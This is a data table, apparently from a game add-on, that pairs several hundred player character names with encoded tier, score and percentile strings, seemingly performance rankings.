["Vilva"] = "ET:643/84%EB:734/93%EM:753/80%",
["Aic"] = "UB:236/30%RM:448/53%",
["Maochiyo"] = "RB:468/67%CM:183/22%",
["Kunlan"] = "UM:337/39%",
["Karsah"] = "UT:108/42%RB:456/60%RM:626/56%",
["Naturesfury"] = "RM:359/66%",
["Christianuwu"] = "UM:370/44%",
["Crispr"] = "CM:70/20%",
["Yeoja"] = "RB:355/72%RM:550/59%",
["Tarrok"] = "UB:268/35%RM:247/60%",
["Neeblet"] = "CB:79/21%UM:407/45%",
["Deyriz"] = "RM:406/72%",
["Qualeb"] = "CT:75/14%RB:484/64%EM:681/75%",
["Deicidez"] = "UM:397/42%",
["Sharpshotbis"] = "UB:129/33%EM:467/81%",
["Aanuoyan"] = "CT:74/14%UB:283/33%RM:205/52%",
["Ddgga"] = "EB:511/92%RM:243/63%",
["Bigmadam"] = "RT:428/68%EB:620/87%EM:622/80%",
["Beefmountain"] = "CT:148/23%EB:385/76%EM:587/77%",
["Kentemon"] = "UB:219/29%RM:214/59%",
["Têss"] = "EB:700/89%EM:901/93%",
["Nicopink"] = "RB:541/72%RM:615/66%",
["Saxa"] = "CT:140/22%EB:530/79%EM:667/85%",
["Pathor"] = "RB:378/51%RM:610/65%",
["Drivebyheal"] = "RT:137/69%EB:437/80%RM:314/62%",
["Benvolio"] = "UB:309/41%UM:142/42%",
["Sherill"] = "ET:646/84%EB:738/93%EM:783/83%",
["Mmeow"] = "LT:750/97%LB:698/95%EM:761/92%",
["Ibreath"] = "UT:63/25%RB:413/54%RM:538/61%",
["Hunker"] = "EB:668/86%EM:711/76%",
["Needas"] = "RM:323/73%",
["Taag"] = "UT:219/26%UM:415/45%",
["Audixo"] = "CT:15/4%CB:146/19%RM:207/58%",
["Swat"] = "EM:748/79%",
["Barackobama"] = "EM:737/76%",
["Gaik"] = "RB:531/69%UM:473/48%",
["Joaaf"] = "RT:436/61%EB:597/76%EM:715/78%",
["Crucial"] = "RM:516/57%",
["Malachaii"] = "UB:160/42%EM:854/89%",
["Buckstabs"] = "EM:792/84%",
["Silvershroud"] = "RT:384/51%RB:297/64%RM:256/56%",
["Givict"] = "RT:117/51%EB:364/77%EM:685/79%",
["Consequence"] = "ET:550/82%EB:692/91%LM:924/96%",
["Xxson"] = "UT:254/47%EB:576/83%RM:618/69%",
["Cyper"] = "CB:60/15%RM:461/51%",
["Vld"] = "UM:207/26%",
["Xiaoweiwei"] = "EM:788/88%",
["Mypopo"] = "UT:99/39%CM:169/20%",
["Brijana"] = "LT:670/98%LB:643/97%LM:738/95%",
["Sporq"] = "RB:388/51%UM:407/47%",
["Spazter"] = "RM:603/62%",
["Kolohe"] = "UB:277/38%RM:417/53%",
["Darcangel"] = "RT:479/65%EB:617/81%RM:654/70%",
["Darynn"] = "CM:198/23%",
["Horrorr"] = "RM:476/70%",
["Siklootbro"] = "CB:83/10%UM:441/49%",
["Waternfood"] = "CB:184/24%RM:556/60%",
["Fibbonacci"] = "UT:341/46%RB:497/64%RM:639/68%",
["Omgdie"] = "RB:444/59%EM:731/78%",
["Wingclipz"] = "CT:0/2%EB:411/80%RM:251/60%",
["Señorafrosty"] = "ET:598/79%RB:451/65%EM:659/78%",
["Brakama"] = "EB:722/91%EM:701/76%",
["Cryozin"] = "UB:259/35%RM:557/66%",
["Orcbot"] = "EM:752/79%",
["Focal"] = "UB:272/36%RM:506/59%",
["Cowculate"] = "RM:565/67%",
["Wwyzzerd"] = "EM:372/78%",
["Deffstorm"] = "RM:666/72%",
["Pushpop"] = "EM:434/83%",
["Ricflaredrip"] = "EB:421/80%EM:587/87%",
["Folicup"] = "UT:89/32%EB:473/84%EM:509/82%",
["Quiet"] = "CT:37/10%EB:592/93%LM:814/96%",
["Ohgeez"] = "UB:115/30%UM:396/47%",
["Richtophen"] = "CB:36/3%RM:596/65%",
["Freecandies"] = "RM:477/57%",
["Atunn"] = "RT:391/64%EB:618/85%EM:777/89%",
["Locknes"] = "CB:122/15%UM:406/41%",
["Kuppo"] = "LT:367/96%EB:351/85%RM:198/51%",
["Girtholomeeu"] = "CB:2/0%",
["Frigidette"] = "RM:254/65%",
["Yutab"] = "RB:419/56%RM:531/61%",
["Mommie"] = "RM:357/65%",
["Morganstanle"] = "ET:689/90%EB:684/92%EM:851/89%",
["Envyn"] = "EB:559/78%EM:518/88%",
["Azzura"] = "UB:103/30%UM:275/28%",
["Adidon"] = "CB:133/16%RM:607/66%",
["Bubblejoo"] = "UB:339/46%EM:693/78%",
["Hydroguzzle"] = "CB:89/11%UM:251/35%",
["Crimith"] = "UB:323/43%UM:240/28%",
["Healtankdps"] = "ET:529/87%EB:604/89%EM:762/89%",
["Crashndburn"] = "CM:22/5%",
["Raphah"] = "RT:433/54%RB:418/59%UM:280/33%",
["Drunkinninja"] = "EM:883/90%",
["Flakés"] = "RM:477/55%",
["Coensmage"] = "RB:433/60%EM:522/88%",
["Calvn"] = "RT:469/65%EB:392/78%RM:624/68%",
["Rylin"] = "RB:390/68%UM:159/48%",
["Vondo"] = "CM:58/7%",
["Worthen"] = "CM:214/20%",
["Ivl"] = "UM:203/49%",
["Tinyfire"] = "RT:545/72%EB:404/78%EM:754/81%",
["Urmawm"] = "RB:488/64%RM:538/61%",
["Hmage"] = "CM:34/10%",
["Fryevia"] = "ET:595/78%EB:714/91%EM:800/85%",
["Velusturs"] = "UM:94/32%",
["Snowmomo"] = "ET:696/90%EB:731/93%EM:763/81%",
["Boltorez"] = "ET:703/93%EB:716/93%RM:537/74%",
["Hahalala"] = "ET:667/87%EB:692/88%RM:248/58%",
["Aprèsmidi"] = "UB:213/49%RM:459/52%",
["Lilmaan"] = "CM:40/4%",
["Bananamoo"] = "ET:708/91%EB:745/94%EM:852/88%",
["Xiaode"] = "CM:179/20%",
["Xiaoyan"] = "LT:456/96%EB:506/94%EM:564/94%",
["Zoredamage"] = "RT:485/64%EB:400/81%EM:794/89%",
["Choupia"] = "RT:216/72%EB:409/80%RM:566/60%",
["Jinmu"] = "ET:253/81%EB:556/82%RM:233/73%",
["Chapchoifan"] = "RT:171/68%RB:385/54%RM:617/72%",
["Aerox"] = "CT:154/20%EB:585/93%RM:630/69%",
["Grandshield"] = "EB:479/90%UM:174/47%",
["Icecoldbaby"] = "UT:74/28%EB:342/76%EM:740/75%",
["Rvse"] = "CT:213/24%UB:280/37%UM:289/33%",
["Bulma"] = "RT:221/71%RB:251/57%",
["Aurorazura"] = "ET:622/82%EB:389/80%RM:432/55%",
["Codyb"] = "EB:580/86%EM:818/92%",
["Rottiepippen"] = "RT:151/53%RB:477/64%EM:776/81%",
["Nooshy"] = "UT:228/30%UB:301/41%UM:308/36%",
["Lilginormus"] = "UT:76/29%EB:721/94%EM:672/94%",
["Richtwo"] = "RT:359/61%EB:663/85%LM:923/97%",
["Scoobly"] = "ET:432/94%EB:694/88%EM:567/86%",
["Gozoy"] = "RB:394/70%EM:790/90%",
["Elpolloloco"] = "EB:609/84%LM:906/95%",
["Mctikkles"] = "RT:232/72%UB:259/32%RM:582/60%",
["Pharaos"] = "ET:315/87%EB:496/90%EM:624/91%",
["Gunbound"] = "ET:640/85%EB:560/76%EM:815/86%",
["Lizzo"] = "ET:283/84%EB:613/81%EM:407/81%",
["Tarde"] = "LT:431/95%EB:524/92%EM:684/94%",
["Aztecwarrior"] = "CB:87/9%RM:289/59%",
["Neonbible"] = "CT:84/15%EB:629/86%EM:602/92%",
["Malmsteenn"] = "ET:306/86%EB:589/78%EM:819/86%",
["Summerpalace"] = "UB:137/30%CM:62/15%",
["Sangwyn"] = "EB:665/86%EM:816/86%",
["Inkognitto"] = "UT:272/40%UB:377/49%EM:621/93%",
["Pecanda"] = "EB:594/76%EM:779/82%",
["Thalakur"] = "ET:413/92%EB:610/80%RM:600/65%",
["Chillju"] = "ET:409/93%EB:637/87%EM:893/92%",
["Meatwod"] = "UT:79/30%EB:614/81%LM:943/95%",
["Ingway"] = "CT:182/21%RB:489/68%EM:801/86%",
["Dríps"] = "UT:233/30%EB:728/92%RM:499/51%",
["Freerunnerqt"] = "ET:342/89%EB:608/84%EM:836/88%",
["Lilkittygato"] = "LT:684/96%LB:741/97%EM:654/85%",
["Decayed"] = "ET:285/86%EB:501/91%EM:657/82%",
["Speirs"] = "LT:451/96%LB:734/97%LM:737/98%",
["Quendrath"] = "ET:312/90%EB:598/87%EM:560/76%",
["Moonieu"] = "LT:511/97%EB:539/93%EM:847/92%",
["Rakurai"] = "RT:173/73%EB:563/94%EM:540/89%",
["Grubstone"] = "RT:201/66%EB:472/85%RM:364/71%",
["Fauztin"] = "LT:552/96%SB:755/99%EM:903/94%",
["Daredman"] = "RB:320/69%RM:322/69%",
["Summlock"] = "ET:612/80%EB:654/84%RM:500/54%",
["Draxyl"] = "CT:182/24%UM:203/26%",
["Hooleechit"] = "ET:417/94%LB:640/95%RM:609/65%",
["Frostytitan"] = "ET:256/79%EB:516/92%EM:378/79%",
["Pruness"] = "ET:439/94%EB:711/90%EM:745/77%",
["Noward"] = "ET:424/91%EB:680/92%LM:840/98%",
["Vexcellen"] = "LT:439/95%LB:658/96%LM:948/97%",
["Fatalcow"] = "ET:413/94%EB:498/91%EM:874/93%",
["Robinhoof"] = "ET:436/94%EB:506/88%RM:624/66%",
["Norml"] = "ET:244/80%EB:614/85%EM:685/84%",
["Wizsword"] = "LT:545/97%LB:678/98%RM:621/74%",
["Sweetpsycho"] = "CT:41/13%",
["Khazoo"] = "ET:402/93%EB:553/94%LM:905/96%",
["Svang"] = "UT:114/36%UM:100/41%",
["Avversione"] = "ET:401/93%EB:706/90%LM:960/97%",
["Amaleonord"] = "UT:109/41%EB:442/87%EM:709/81%",
["Juké"] = "RT:206/70%EB:582/76%EM:851/88%",
["Etumn"] = "ET:390/93%EB:401/81%RM:642/70%",
["Twotwotwo"] = "RT:160/55%RB:547/73%RM:534/58%",
["Sxt"] = "UT:334/45%EB:689/88%EM:797/83%",
["Bawan"] = "ET:597/79%EB:628/81%UM:419/48%",
["Ryuujo"] = "RT:151/56%EB:635/83%EM:473/81%",
["Norich"] = "RT:217/70%EB:460/83%RM:583/64%",
["Gheisty"] = "EB:722/92%EM:816/86%",
["Alwayzfaded"] = "ET:242/76%EB:417/83%EM:546/90%",
["Bama"] = "CB:188/22%RM:487/57%",
["Melonman"] = "CT:138/18%CB:70/18%CM:66/7%",
["Cumbustion"] = "CT:42/14%EB:628/86%UM:208/29%",
["Diklik"] = "CT:158/20%UB:117/29%CM:155/19%",
["Course"] = "CT:83/10%CM:133/12%",
["Arifan"] = "RT:214/63%EB:367/77%EM:699/80%",
["Scareypotter"] = "CT:132/22%EB:336/75%RM:197/57%",
["Daized"] = "EB:745/94%EM:785/83%",
["Vyzr"] = "UT:199/26%UB:262/34%RM:363/68%",
["Karlsjr"] = "CB:207/23%EM:777/84%",
["Teqtonic"] = "ET:695/92%EB:677/91%EM:525/91%",
["Dugorend"] = "ET:321/87%EB:446/83%EM:500/83%",
["Constatine"] = "ET:449/79%RB:449/74%UM:99/45%",
["Fearstar"] = "RT:220/69%RB:510/68%UM:428/43%",
["Boozerz"] = "ET:558/75%EB:706/92%EM:827/86%",
["Mcdonaldzz"] = "RT:146/54%RB:405/55%RM:672/73%",
["Ggininder"] = "UT:248/46%RB:454/68%EM:609/79%",
["Dieyin"] = "LT:776/98%EB:614/90%EM:803/93%",
["Weikai"] = "ET:563/88%EB:591/84%LM:919/97%",
["Mesona"] = "UM:451/49%",
["Snj"] = "LT:664/95%EB:589/87%EM:776/90%",
["Konosubaru"] = "ET:650/90%EB:622/85%EM:864/93%",
["Nonokahana"] = "UT:350/46%RB:455/66%RM:508/56%",
["Calley"] = "LT:766/97%EB:596/93%EM:817/86%",
["Kaltanken"] = "CT:30/11%RB:240/55%RM:273/61%",
["Axolotl"] = "ET:619/87%LB:578/95%EM:768/88%",
["Lanekiffin"] = "ET:141/79%EB:446/91%EM:381/84%",
["Keltonn"] = "RT:205/66%EB:411/78%RM:361/71%",
["Ikthus"] = "RT:469/63%EB:578/92%EM:899/92%",
["Headshotz"] = "CT:185/24%RB:328/70%EM:506/83%",
["Worclocker"] = "RT:523/69%EB:511/87%EM:618/89%",
["Torrack"] = "UT:352/47%EB:615/94%EM:754/94%",
["Alcapone"] = "CT:176/23%UB:172/43%RM:344/72%",
["Veld"] = "LT:581/97%EB:598/93%EM:611/88%",
["Shiesta"] = "ET:332/88%RB:338/70%RM:423/74%",
["Thotimas"] = "UT:120/46%EB:511/75%EM:819/91%",
["Desicrate"] = "CT:51/5%CM:86/11%",
["Johnnyjohn"] = "ET:310/85%CB:79/21%",
["Siarmo"] = "ET:351/90%EB:743/94%LM:941/95%",
["Ponii"] = "RT:174/62%RB:459/63%RM:503/56%",
["Minny"] = "RT:432/68%EB:497/76%EM:702/75%",
["Arukard"] = "LT:506/96%EB:676/86%EM:638/90%",
["Budoken"] = "LT:587/98%EB:700/92%EM:789/89%",
["Hurakan"] = "ET:301/86%EB:615/80%RM:679/65%",
["Meldarra"] = "ET:420/93%EB:583/76%RM:628/65%",
["Wawwiow"] = "LT:595/98%EB:671/89%EM:795/89%",
["Jonessmash"] = "ET:325/89%RB:336/71%RM:481/55%",
["Efx"] = "ET:293/85%RB:575/73%EM:825/80%",
["Eiky"] = "LT:439/97%EB:638/92%EM:467/89%",
["Greecee"] = "ET:294/85%EB:643/83%EM:789/85%",
["Kajind"] = "ET:297/86%EB:533/80%EM:806/84%",
["Armz"] = "ET:264/80%UB:128/35%",
["Treefidy"] = "ET:596/91%EB:668/93%LM:773/96%",
["Coko"] = "ET:303/88%EB:710/93%EM:334/82%",
["Rockslayer"] = "LT:572/97%EB:642/89%LM:906/96%",
["Soulstoned"] = "ET:351/89%RB:243/56%RM:364/71%",
["Kryzanttv"] = "ET:379/92%",
["Mukmukmert"] = "ET:257/78%",
["Liilz"] = "ET:311/86%RB:445/64%EM:687/79%",
["Tundras"] = "LT:529/97%EB:618/89%LM:945/98%",
["Jelooble"] = "ET:416/94%EB:724/91%EM:458/80%",
["Triasa"] = "RT:450/70%EB:491/76%RM:242/74%",
["Odwin"] = "ET:334/88%EB:604/79%EM:795/83%",
["Drainelle"] = "ET:401/92%EB:668/85%EM:892/92%",
["Imeltfaces"] = "ET:313/85%EB:651/84%RM:715/74%",
["Gerrygnome"] = "LT:744/95%LB:800/98%EM:822/91%",
["Stonex"] = "RT:198/68%EB:382/81%EM:755/80%",
["Xanwich"] = "ET:327/87%EB:704/89%EM:881/91%",
["Hentaimist"] = "ET:358/90%EB:561/91%EM:870/89%",
["Vida"] = "RT:151/61%RB:421/68%EM:333/82%",
["Flyingbull"] = "ET:516/77%RB:448/71%EM:611/79%",
["Epicmage"] = "ET:590/78%RB:496/65%EM:784/81%",
["Saberoy"] = "RT:472/73%RB:482/72%RM:453/73%",
["Nicoco"] = "RT:240/73%EB:586/77%RM:701/73%",
["Nawahan"] = "RT:147/59%RB:341/59%UM:214/40%",
["Shavronne"] = "CT:74/13%CB:80/10%CM:111/15%",
["Pandabat"] = "RM:493/54%",
["Zhengfucuier"] = "ET:539/80%EB:547/81%RM:520/72%",
["Barriers"] = "ET:556/81%EB:512/78%",
["Olddru"] = "CT:50/7%EB:648/91%EM:709/87%",
["Revvs"] = "RT:476/61%RB:511/73%EM:891/93%",
["Swoopei"] = "RT:438/62%UB:278/37%RM:223/61%",
["Zeroangel"] = "ET:573/92%LB:633/98%LM:801/97%",
["Kado"] = "CT:0/0%RB:505/68%EM:486/79%",
["Hiellin"] = "ET:305/90%EB:712/93%EM:625/93%",
["Sholana"] = "LT:710/95%LB:761/98%LM:858/95%",
["Thunderthye"] = "ET:586/84%EB:561/82%RM:381/73%",
["Wheredidhego"] = "UB:243/31%UM:204/49%",
["Icedteeth"] = "RM:606/67%",
["Gorb"] = "RB:420/55%RM:512/54%",
["Babyx"] = "CB:105/13%CM:20/4%",
["Sektor"] = "ET:320/89%EB:696/91%EM:847/92%",
["Jollytime"] = "UB:339/45%UM:268/27%",
["Boosterclub"] = "CM:54/19%",
["Beljuun"] = "ET:571/83%EB:543/93%EM:811/90%",
["Shusha"] = "CB:104/12%CM:46/3%",
["Carillara"] = "CM:99/14%",
["Nobu"] = "RT:224/71%RB:493/63%UM:453/48%",
["Exitstrategy"] = "LT:467/95%EB:712/91%LM:960/97%",
["Nefarious"] = "RT:223/71%RB:515/69%EM:829/85%",
["Mogreth"] = "ET:319/85%RB:499/65%EM:761/79%",
["Jackburtonx"] = "ET:271/81%EB:654/89%EM:881/94%",
["Niftyshigga"] = "UT:88/32%",
["Azzraell"] = "ET:353/90%EB:670/86%EM:855/88%",
["Hamduskee"] = "ET:266/81%UB:369/48%RM:485/53%",
["Elvarg"] = "RT:199/68%UM:269/33%",
["Arnej"] = "ET:225/77%EB:605/85%EM:587/77%",
["Watchmeflip"] = "ET:326/88%EB:429/81%RM:291/64%",
["Jespine"] = "LT:440/95%LB:748/95%EM:897/93%",
["Oktha"] = "UT:113/44%RB:479/63%RM:538/61%",
["Tvoc"] = "LT:532/96%EB:564/78%EM:753/82%",
["Atun"] = "ET:322/88%RB:514/70%RM:337/70%",
["Corich"] = "ET:431/93%EB:638/82%RM:670/69%",
["Vandeepholm"] = "RT:211/66%EB:526/78%EM:768/87%",
["Alivera"] = "ET:428/93%EB:597/78%EM:760/79%",
["Mennopower"] = "RT:139/52%RB:464/61%RM:612/65%",
["Kaiin"] = "ET:296/88%LB:741/97%EM:776/91%",
["Shooms"] = "LT:505/97%EB:679/91%EM:668/85%",
["Iborecon"] = "ET:357/93%EB:578/88%EM:524/76%",
["Putrighton"] = "LT:484/96%EB:687/89%EM:893/93%",
["Beorginyon"] = "ET:257/80%RB:340/70%RM:657/70%",
["Holydeeznutz"] = "CT:27/0%CB:65/13%",
["Exkarin"] = "UT:74/33%UB:96/27%RM:546/64%",
["Pocketqueens"] = "CT:56/20%RB:528/69%RM:685/73%",
["Batches"] = "CT:43/9%UB:178/46%CM:29/1%",
["Cropdust"] = "EB:462/75%EM:727/86%",
["Gbehindu"] = "UT:219/28%RB:427/57%RM:506/57%",
["Sause"] = "RT:528/70%RB:558/74%EM:888/89%",
["Farq"] = "RB:370/51%RM:581/68%",
["Liberates"] = "LB:759/97%LM:900/95%",
["Lolroxy"] = "CT:0/4%UB:242/31%RM:574/63%",
["Moneishot"] = "ET:325/88%RB:493/71%RM:542/63%",
["Ikarf"] = "LT:501/97%LB:741/97%EM:746/90%",
["Skellz"] = "ET:591/79%LB:751/95%EM:917/94%",
["Ghetrekt"] = "LT:466/95%LB:741/96%LM:942/97%",
["Barray"] = "LT:605/98%EB:653/85%EM:765/81%",
["Glechlen"] = "RB:428/60%EM:453/84%",
["Cretch"] = "ET:602/84%LB:751/95%LM:865/98%",
["Shinys"] = "CM:55/4%",
["Zulizzaban"] = "RB:495/65%EM:812/80%",
["Kittycatman"] = "ET:577/84%EB:618/90%EM:741/90%",
["Boozehound"] = "CT:61/22%UB:264/35%CM:170/20%",
["Cluntstovens"] = "RB:466/64%RM:448/50%",
["Novèmbér"] = "RT:522/71%EB:425/85%RM:610/68%",
["Xtramadol"] = "CB:37/6%UM:128/36%",
["Billkingdom"] = "RB:207/53%EM:408/81%",
["Alleba"] = "RT:525/66%EB:624/86%EM:856/90%",
["Zerok"] = "CT:170/22%LB:627/97%EM:835/91%",
["Hari"] = "RT:156/57%RB:409/57%RM:252/65%",
["Drultuskar"] = "UM:105/38%",
["Anticaster"] = "RT:410/66%LB:583/95%EM:752/87%",
["Ötzi"] = "RB:380/52%RM:670/71%",
["Capharnaum"] = "CB:98/12%",
["Byako"] = "EB:627/81%EM:882/90%",
["Jujubone"] = "UT:131/41%RB:525/73%EM:824/87%",
["Imari"] = "CB:78/18%UM:92/30%",
["Zuus"] = "UT:95/35%UB:333/44%EM:770/80%",
["Whëëp"] = "RT:185/65%RB:286/66%EM:522/86%",
["Orgeth"] = "RT:490/67%EB:662/86%EM:585/88%",
["Allara"] = "RB:410/57%RM:300/71%",
["Hexnosis"] = "EB:602/79%EM:840/89%",
["Rrockin"] = "EB:570/75%UM:443/45%",
["Jamiechung"] = "UB:305/43%UM:378/40%",
["Stefndi"] = "UT:102/37%EB:483/85%RM:366/71%",
["Smh"] = "ET:644/85%SB:833/99%SM:1080/99%",
["Toxicana"] = "UB:240/32%",
["Ilovthistoon"] = "UB:161/43%RM:436/51%",
["Hashrosin"] = "ET:260/79%EB:542/77%EM:736/80%",
["Auryna"] = "RT:433/54%EB:551/79%EM:748/85%",
["Flurrious"] = "RB:443/55%RM:390/73%",
["Oriön"] = "ET:671/88%LB:777/97%EM:866/89%",
["Acaciaa"] = "UB:364/47%UM:448/49%",
["Luann"] = "RT:504/67%EB:708/93%RM:623/72%",
["Lilmurder"] = "RT:516/70%RB:526/69%EM:818/81%",
["Acekicker"] = "RB:354/50%EM:804/82%",
["Sippip"] = "RT:502/66%RB:543/72%EM:866/91%",
["Tribulatiøn"] = "RB:427/56%RM:618/68%",
["Mjxjb"] = "RB:368/50%CM:180/24%",
["Goor"] = "RT:542/73%RB:456/60%UM:335/38%",
["Luckincoffee"] = "ET:677/88%RB:520/74%EM:361/77%",
["Tesla"] = "LT:410/95%LB:729/96%SM:855/99%",
["Dak"] = "ET:305/88%EB:668/89%EM:532/92%",
["Finnanut"] = "ET:264/78%EB:635/82%EM:677/91%",
["Krumped"] = "RB:214/50%EM:601/92%",
["Weezi"] = "RT:456/62%EB:640/82%EM:679/91%",
["Edexalt"] = "RM:320/64%",
["Amli"] = "ET:291/84%EB:538/75%EM:880/94%",
["Swampdonky"] = "RM:561/62%",
["Voorijder"] = "EB:587/78%RM:539/60%",
["Forevernimo"] = "RT:180/70%EB:643/92%EM:826/94%",
["Melmoth"] = "RT:462/60%RB:550/73%RM:456/52%",
["Rageclaws"] = "UT:183/25%EB:559/86%EM:625/81%",
["Mainus"] = "RB:296/69%UM:441/48%",
["Dapperjon"] = "UB:121/32%CM:207/20%",
["Elastic"] = "ET:671/87%RB:480/63%",
["Kõnfined"] = "ET:313/85%EB:506/87%EM:718/77%",
["Shootrmcgåvn"] = "CT:123/15%UB:378/49%UM:473/49%",
["Pleasent"] = "ET:656/86%LB:629/97%UM:279/34%",
["Pikatroll"] = "UM:247/30%",
["Jlouo"] = "RB:548/73%RM:615/68%",
["Rubberduckey"] = "ET:339/90%EB:716/93%EM:735/88%",
["Frosky"] = "RB:512/72%RM:278/68%",
["Zziz"] = "ET:340/88%EB:635/82%RM:618/68%",
["Joshua"] = "RM:520/61%",
["Myname"] = "ET:412/94%EB:701/92%EM:856/92%",
["Gtwopriority"] = "CT:0/1%CB:26/1%CM:32/2%",
["Jessup"] = "RT:153/53%RB:419/56%RM:632/69%",
["Poolnoodler"] = "CM:156/15%",
["Bowsers"] = "EB:660/85%EM:805/84%",
["Flublock"] = "UB:294/39%RM:215/54%",
["Tomahawka"] = "LT:481/96%EB:635/83%EM:609/89%",
["Magebubu"] = "CT:14/8%CM:118/17%",
["Lifeisgame"] = "ET:694/93%EB:624/82%EM:858/90%",
["Pizzabagels"] = "ET:606/81%RB:440/60%RM:636/69%",
["Grymmsoul"] = "EB:565/75%RM:684/67%",
["Crylos"] = "RT:229/74%EB:676/87%RM:628/69%",
["Ldvoldemort"] = "ET:331/88%EB:686/92%LM:880/95%",
["Chiln"] = "LB:777/98%EM:834/91%",
["Silentium"] = "RB:484/65%RM:637/69%",
["Fabulòus"] = "CT:120/20%EB:624/81%EM:808/86%",
["Silentshot"] = "CB:188/24%UM:339/38%",
["Doochey"] = "RT:177/63%EB:575/75%EM:575/87%",
["Diohunt"] = "UT:118/45%RB:503/68%RM:246/60%",
["Elliemae"] = "CT:70/8%EB:691/89%EM:868/90%",
["Saetikwe"] = "CB:212/23%UM:52/28%",
["Lethadaddy"] = "EB:670/87%RM:522/58%",
["Jombie"] = "UB:358/49%CM:169/23%",
["Yvertregoros"] = "RB:439/59%EM:823/86%",
["Hisashi"] = "UM:207/26%",
["Valá"] = "RB:476/74%RM:258/56%",
["Burizadecorn"] = "CB:92/12%UM:193/25%",
["Alorra"] = "ET:339/82%EB:603/90%EM:771/91%",
["Qaige"] = "RB:462/65%CM:55/20%",
["Voxsmorc"] = "ET:606/80%EB:699/89%EM:836/88%",
["Hxt"] = "LT:509/96%EB:376/77%RM:586/67%",
["Chochobani"] = "CT:42/3%EB:435/84%UM:303/31%",
["Hodan"] = "EB:670/84%EM:735/77%",
["Benjxmage"] = "UT:70/26%RB:275/66%RM:303/71%",
["Arovo"] = "RB:522/70%EM:461/77%",
["Bingjia"] = "EB:364/79%RM:296/70%",
["Timduncan"] = "ET:619/87%EB:691/91%EM:634/80%",
["Littlejohn"] = "EB:562/91%EM:898/92%",
["Duckillfixit"] = "LT:752/95%LB:780/97%EM:921/94%",
["Vipp"] = "UB:279/36%CM:130/11%",
["Ineedgold"] = "EB:406/83%CM:27/2%",
["Apstar"] = "EB:734/92%EM:860/88%",
["Xiye"] = "EB:477/87%EM:730/78%",
["Blazerr"] = "RB:280/61%RM:483/51%",
["Somedecency"] = "LT:753/96%LB:649/96%UM:326/33%",
["Somefood"] = "RB:252/63%CM:45/16%",
["Thingss"] = "ET:269/79%EB:592/93%EM:905/93%",
["Ayalas"] = "UT:309/43%RB:481/66%EM:808/87%",
["Nitsirk"] = "RM:348/72%",
["Shortshady"] = "RB:297/59%EM:704/84%",
["Revano"] = "UM:107/35%",
["Bestskin"] = "RB:297/54%EM:821/91%",
["Aprilzodiac"] = "RB:506/68%EM:770/81%",
["Brojogan"] = "UB:92/34%UM:63/34%",
["Regii"] = "UB:287/38%EM:822/88%",
["Spocket"] = "UB:260/35%RM:243/57%",
["Leafshark"] = "RB:265/67%RM:439/71%",
["Evildarkx"] = "UB:268/33%CM:84/11%",
["Warlwing"] = "RB:465/63%RM:551/57%",
["Starbustbow"] = "UT:118/45%RB:319/69%RM:561/59%",
["Xaya"] = "EB:682/90%EM:777/89%",
["Rockharddump"] = "UT:226/33%UB:192/40%RM:618/66%",
["Dptmwow"] = "CT:26/5%RB:446/61%RM:376/74%",
["Sulashan"] = "ET:264/80%RB:516/72%EM:695/76%",
["Songflower"] = "CM:73/10%",
["Diebish"] = "RB:464/64%EM:752/79%",
["Vandalheart"] = "CB:61/14%UM:504/49%",
["Hellismyname"] = "CT:54/10%UB:147/35%UM:136/40%",
["Vegvísir"] = "LT:507/97%EB:735/93%EM:874/90%",
["Robit"] = "LT:645/98%EB:722/92%EM:917/93%",
["Obzenn"] = "CB:85/10%",
["Cattywompus"] = "LT:583/98%LB:693/95%EM:543/79%",
["Hwadam"] = "RT:461/63%EB:672/86%EM:404/75%",
["Trx"] = "ET:262/80%RB:418/71%RM:551/71%",
["Hydrätion"] = "UB:112/29%UM:390/42%",
["Adelayde"] = "EB:555/82%EM:693/84%",
["Fyrefly"] = "EB:554/77%EM:654/76%",
["Autobot"] = "EB:658/85%RM:637/70%",
["Tradayge"] = "RT:380/50%EB:591/83%EM:774/86%",
["Marechi"] = "RB:247/56%RM:526/59%",
["Greggles"] = "EB:399/84%EM:746/88%",
["Neoya"] = "CB:36/8%UM:102/36%",
["Thefox"] = "ET:368/91%EB:478/86%EM:817/85%",
["Nostron"] = "CT:33/12%RB:284/63%RM:583/66%",
["Évilsloth"] = "RT:168/60%EB:634/83%EM:854/90%",
["Fireog"] = "ET:267/86%EB:619/88%EM:542/89%",
["Aimedfarts"] = "UT:305/40%EB:380/76%RM:519/58%",
["Lucìna"] = "UT:256/34%EB:553/79%UM:283/34%",
["Charizaad"] = "CT:69/8%EB:673/90%EM:616/92%",
["Caçtus"] = "ET:324/88%EB:621/86%EM:669/79%",
["Synzar"] = "RB:547/73%EM:715/93%",
["Mappz"] = "EB:595/78%RM:565/61%",
["Mesothalassa"] = "RB:417/60%EM:559/87%",
["Rainel"] = "CB:133/17%CM:64/8%",
["Drfear"] = "RT:216/69%RB:527/70%RM:579/60%",
["Thievy"] = "EB:648/82%UM:273/27%",
["Sakurenai"] = "EB:452/84%EM:766/80%",
["Loregar"] = "EB:576/76%",
["Arliya"] = "EB:719/91%",
["Wizzywill"] = "EB:679/88%EM:866/90%",
["Raphtaria"] = "UB:218/44%EM:587/77%",
["Heeheeheehee"] = "LT:440/95%EB:690/91%LM:891/95%",
["Maguro"] = "CT:86/10%UB:363/49%RM:503/56%",
["Fixdwarf"] = "UM:256/29%",
["Solaran"] = "EB:532/86%EM:520/91%",
["Wunderlich"] = "UM:287/38%",
["Alphá"] = "CT:130/21%RM:162/51%",
["Bloodcuz"] = "UT:322/47%EB:594/82%EM:479/86%",
["Stinkystar"] = "EB:373/76%EM:771/90%",
["Razie"] = "CM:13/3%",
["Phersephone"] = "RB:364/74%UM:120/38%",
["Mogaro"] = "ET:334/89%EB:577/92%EM:837/87%",
["Binbly"] = "CT:27/1%RB:426/58%RM:339/66%",
["Impavidus"] = "EB:730/92%EM:882/91%",
["Gennji"] = "EB:604/77%RM:676/73%",
["Misscleavage"] = "UB:377/49%CM:127/16%",
["Gwarloc"] = "CB:93/11%UM:66/25%",
["Regiin"] = "UB:148/38%CM:48/6%",
["Wiliams"] = "RT:393/51%EB:536/90%EM:781/82%",
["Feinted"] = "EM:747/80%",
["Vodkatonic"] = "RB:402/53%EM:720/78%",
["Elittlezei"] = "EB:607/77%LM:952/96%",
["Tinyfirehose"] = "CT:50/17%CB:73/7%RM:512/60%",
["Slickest"] = "EM:807/89%",
["Callo"] = "CM:26/5%",
["Orbius"] = "UT:101/46%RM:239/63%",
["Evilego"] = "CB:1/0%EM:474/90%",
["Anustârt"] = "CB:139/17%CM:206/20%",
["Cuckmiser"] = "LT:479/95%RB:445/60%EM:445/78%",
